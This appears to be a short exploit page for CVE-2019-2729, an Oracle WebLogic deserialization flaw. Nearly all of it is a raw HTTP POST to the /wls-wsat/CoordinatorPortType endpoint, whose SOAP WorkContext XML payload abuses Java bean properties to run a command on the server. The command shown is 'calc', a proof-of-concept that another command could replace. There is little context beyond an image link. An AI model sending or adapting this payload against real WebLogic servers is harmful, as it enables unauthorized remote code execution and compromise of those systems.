CVE-2019-2729 Exploit Script

Summary[1]: https://p4.ssl.qhimg.com/t014181cde9da013819.png

Image description
TEXT
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.211.55.6:7001
Content-Type: text/xml
SOAPAction: ""
Content-Length: 1017
Host: 127.0.0.1
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java>
        <field id="publicStaticField" name="ST_ANY_TYPE" class="com.bea.xbean.schema.BuiltinSchemaTypeSystem">
        <property id="propertySet" name="fullJavaName">
        <string>weblogic.nodemanager.client.ShellClient</string>
        </property>
        </field>
        <var id="evalClass" idref="publicStaticField"><property id="propertyGet" name="javaClass"><void><string>calc</string><property name="domainName"><string>base_domain</string></property><property name="serverName"><string>AdminServer</string></property><property name="version"/></void></property></var>
    </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>